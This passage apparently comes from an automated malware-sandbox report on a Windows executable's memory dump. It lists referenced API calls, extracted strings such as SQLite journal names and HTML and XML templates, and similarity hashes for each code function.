                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                                                  • String ID: strings
                                                                                                                  • API String ID: 3166385802-3030018805
                                                                                                                  • Opcode ID: 07dd20e83a72376c017d688d2d43246e42d1d17d60f688a4af98472ad4cd9316
                                                                                                                  • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                                                                                  • Opcode Fuzzy Hash: 07dd20e83a72376c017d688d2d43246e42d1d17d60f688a4af98472ad4cd9316
                                                                                                                  • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 00411AF6
                                                                                                                    • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                                                                                  • wcsrchr.MSVCRT ref: 00411B14
                                                                                                                  • wcscat.MSVCRT ref: 00411B2E
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                                                                  • String ID: AE$.cfg$General$EA
                                                                                                                  • API String ID: 776488737-1622828088
                                                                                                                  • Opcode ID: 83214be69100a2e0159230acb683643c3f3e541604283d72b2cc5b33c3359a8e
                                                                                                                  • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                                                                                                                  • Opcode Fuzzy Hash: 83214be69100a2e0159230acb683643c3f3e541604283d72b2cc5b33c3359a8e
                                                                                                                  • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 0040D8BD
                                                                                                                  • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                                                                                                  • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                                                                                                  • memset.MSVCRT ref: 0040D906
                                                                                                                  • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                                                                                                  • _wcsicmp.MSVCRT ref: 0040D92F
                                                                                                                    • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                                                                                                    • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                                                                  • String ID: sysdatetimepick32
                                                                                                                  • API String ID: 1028950076-4169760276
                                                                                                                  • Opcode ID: dc1af48194af82a98770d28407c75daa8b541611d8ddf07168db58443698622d
                                                                                                                  • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                                                                                                  • Opcode Fuzzy Hash: dc1af48194af82a98770d28407c75daa8b541611d8ddf07168db58443698622d
                                                                                                                  • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                                                                                                  APIs
                                                                                                                  • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B911
                                                                                                                  • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B923
                                                                                                                  • memcpy.MSVCRT(?,-journal,00000008,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B93B
                                                                                                                  • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B958
                                                                                                                  • memcpy.MSVCRT(?,-wal,00000004,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041B970
                                                                                                                  • memset.MSVCRT ref: 0041BA3D
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpy$memset
                                                                                                                  • String ID: -journal$-wal
                                                                                                                  • API String ID: 438689982-2894717839
                                                                                                                  • Opcode ID: d962323e81d37dfb90646eb98bd258cd4124eefff3809fb07e01f1771a5947a6
                                                                                                                  • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                                                                                                  • Opcode Fuzzy Hash: d962323e81d37dfb90646eb98bd258cd4124eefff3809fb07e01f1771a5947a6
                                                                                                                  • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                                                                                                  APIs
                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                                                                                                  • EndDialog.USER32(?,00000002), ref: 00405C83
                                                                                                                  • EndDialog.USER32(?,00000001), ref: 00405C98
                                                                                                                    • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                                                                                                    • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                                                                                                  • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                                                                                                  • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: Item$Dialog$MessageSend
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3975816621-0
                                                                                                                  • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                                                  • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                                                                                                                  • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                                                  • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                                                                                                                  APIs
                                                                                                                  • _wcsicmp.MSVCRT ref: 00444D09
                                                                                                                  • _wcsicmp.MSVCRT ref: 00444D1E
                                                                                                                  • _wcsicmp.MSVCRT ref: 00444D33
                                                                                                                    • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                                    • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                                    • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: _wcsicmp$wcslen$_memicmp
                                                                                                                  • String ID: .save$http://$https://$log profile$signIn
                                                                                                                  • API String ID: 1214746602-2708368587
                                                                                                                  • Opcode ID: eb43a17493a81dd81a499902e520f22142985c343e331a56dc5f09596e4914e7
                                                                                                                  • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
                                                                                                                  • Opcode Fuzzy Hash: eb43a17493a81dd81a499902e520f22142985c343e331a56dc5f09596e4914e7
                                                                                                                  • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                                                                                                                  APIs
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(0000000C), ref: 00405DE1
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00405DFD
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E23
                                                                                                                  • memset.MSVCRT ref: 00405E33
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E62
                                                                                                                  • InvalidateRect.USER32(?,00000000,00000000,?,?,?,?), ref: 00405EAF
                                                                                                                  • SetFocus.USER32(?,?,?,?), ref: 00405EB8
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00405EC8
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2313361498-0
                                                                                                                  • Opcode ID: 714c78ee16b9d0c535b2ccd9b722d7140f358af2491426836a426c957dcc8526
                                                                                                                  • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                                                                                                                  • Opcode Fuzzy Hash: 714c78ee16b9d0c535b2ccd9b722d7140f358af2491426836a426c957dcc8526
                                                                                                                  • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
                                                                                                                  APIs
                                                                                                                  • GetClientRect.USER32(?,?), ref: 00405F65
                                                                                                                  • GetWindow.USER32(?,00000005), ref: 00405F7D
                                                                                                                  • GetWindow.USER32(00000000), ref: 00405F80
                                                                                                                    • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                                                                                                                  • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                                                                                                                  • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                                                                                                                  • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                                                                                                                  • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                                                                                                                  • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$ItemMessageRectSend$Client
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2047574939-0
                                                                                                                  • Opcode ID: e98f1b8ec4c98c4b3f876b541513d14ca347a33c497b9d7b5490fbbe5922d292
                                                                                                                  • Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
                                                                                                                  • Opcode Fuzzy Hash: e98f1b8ec4c98c4b3f876b541513d14ca347a33c497b9d7b5490fbbe5922d292
                                                                                                                  • Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                                                                                    • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                                                                                    • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                                                    • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                                                  • memcpy.MSVCRT(?,?,00000040), ref: 0044A8BF
                                                                                                                  • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044A90C
                                                                                                                  • memcpy.MSVCRT(?,?,00000040), ref: 0044A988
                                                                                                                    • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000040,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A422
                                                                                                                    • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000008,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A46E
                                                                                                                  • memcpy.MSVCRT(?,?,00000000), ref: 0044A9D8
                                                                                                                  • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 0044AA19
                                                                                                                  • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 0044AA4A
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpy$memset
                                                                                                                  • String ID: gj
                                                                                                                  • API String ID: 438689982-4203073231
                                                                                                                  • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                                  • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                                                                                                  • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                                  • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                                                                                                  APIs
                                                                                                                  • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000), ref: 00430D77
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpy
                                                                                                                  • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                                                                                                                  • API String ID: 3510742995-2446657581
                                                                                                                  • Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                                                                  • Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
                                                                                                                  • Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                                                                  • Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
                                                                                                                  APIs
                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                                                                                                  • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                                                                                                  • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                                                                                                  • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                                                                                                  • memset.MSVCRT ref: 00405ABB
                                                                                                                  • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                                                                                                  • SetFocus.USER32(?), ref: 00405B76
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$FocusItemmemset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4281309102-0
                                                                                                                  • Opcode ID: 2f4c27367ad0dcd0df6ff95742fdfb823844e6920604fec48c7e171fffcef4b8
                                                                                                                  • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                                                                                                                  • Opcode Fuzzy Hash: 2f4c27367ad0dcd0df6ff95742fdfb823844e6920604fec48c7e171fffcef4b8
                                                                                                                  • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: _snwprintfwcscat
                                                                                                                  • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                                  • API String ID: 384018552-4153097237
                                                                                                                  • Opcode ID: ceefa94603245cfdc84b5d7ac4d3bb9d057f1e5f82a05c255ee601070e84ce5a
                                                                                                                  • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                                                                                                                  • Opcode Fuzzy Hash: ceefa94603245cfdc84b5d7ac4d3bb9d057f1e5f82a05c255ee601070e84ce5a
                                                                                                                  • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                                                  • String ID: 0$6
                                                                                                                  • API String ID: 2029023288-3849865405
                                                                                                                  • Opcode ID: a1397ef96222afd124a0cc802277b776f8ca8d8a268962530e532de87b957585
                                                                                                                  • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                                                                                                  • Opcode Fuzzy Hash: a1397ef96222afd124a0cc802277b776f8ca8d8a268962530e532de87b957585
                                                                                                                  • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                                                                                  • memset.MSVCRT ref: 00405455
                                                                                                                  • memset.MSVCRT ref: 0040546C
                                                                                                                  • memset.MSVCRT ref: 00405483
                                                                                                                  • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00405498
                                                                                                                  • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054AD
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$memcpy$ErrorLast
                                                                                                                  • String ID: 6$\
                                                                                                                  • API String ID: 404372293-1284684873
                                                                                                                  • Opcode ID: 0330b9b22cd30b5b2625a0a7e6ceceae146d238a8b356c7611763844912e7754
                                                                                                                  • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                                                                                                  • Opcode Fuzzy Hash: 0330b9b22cd30b5b2625a0a7e6ceceae146d238a8b356c7611763844912e7754
                                                                                                                  • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                                                                                                  APIs
                                                                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                                                                                  • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                                                                                  • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                                                                                  • wcscpy.MSVCRT ref: 0040A0D9
                                                                                                                  • wcscat.MSVCRT ref: 0040A0E6
                                                                                                                  • wcscat.MSVCRT ref: 0040A0F5
                                                                                                                  • wcscpy.MSVCRT ref: 0040A107
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1331804452-0
                                                                                                                  • Opcode ID: 23c89843948f9d4d6ccb23a927c15bd8e6af065920e5565f2ade9cfd678fbabf
                                                                                                                  • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                                                                                  • Opcode Fuzzy Hash: 23c89843948f9d4d6ccb23a927c15bd8e6af065920e5565f2ade9cfd678fbabf
                                                                                                                  • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                                                                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                                  • String ID: advapi32.dll
                                                                                                                  • API String ID: 2012295524-4050573280
                                                                                                                  • Opcode ID: b64713afd4556e5fbbb7ed04bcda3af9e72832f174230b27e3163565a40eb309
                                                                                                                  • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                                                                                                  • Opcode Fuzzy Hash: b64713afd4556e5fbbb7ed04bcda3af9e72832f174230b27e3163565a40eb309
                                                                                                                  • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  • <%s>, xrefs: 004100A6
                                                                                                                  • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                                                                                  • <?xml version="1.0" ?>, xrefs: 0041007C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$_snwprintf
                                                                                                                  • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                  • API String ID: 3473751417-2880344631
                                                                                                                  • Opcode ID: 2b06e63593618d13b5a5b8efcda018c795261ff0c1630acf280f9998f6f819b8
                                                                                                                  • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                                                                                  • Opcode Fuzzy Hash: 2b06e63593618d13b5a5b8efcda018c795261ff0c1630acf280f9998f6f819b8
                                                                                                                  • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: wcscat$_snwprintfmemset
                                                                                                                  • String ID: %2.2X
                                                                                                                  • API String ID: 2521778956-791839006
                                                                                                                  • Opcode ID: 31c2c2b958cbfb7d79e881a69437bc30ebdfa5a8327fe047e8a0291744cff554
                                                                                                                  • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                                                                                  • Opcode Fuzzy Hash: 31c2c2b958cbfb7d79e881a69437bc30ebdfa5a8327fe047e8a0291744cff554
                                                                                                                  • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: _snwprintfwcscpy
                                                                                                                  • String ID: dialog_%d$general$menu_%d$strings
                                                                                                                  • API String ID: 999028693-502967061
                                                                                                                  • Opcode ID: 80a89c9967db9934379ab2cd2962a5087f7f7915bf37897dca38dc6723802d56
                                                                                                                  • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                                                                                  • Opcode Fuzzy Hash: 80a89c9967db9934379ab2cd2962a5087f7f7915bf37897dca38dc6723802d56
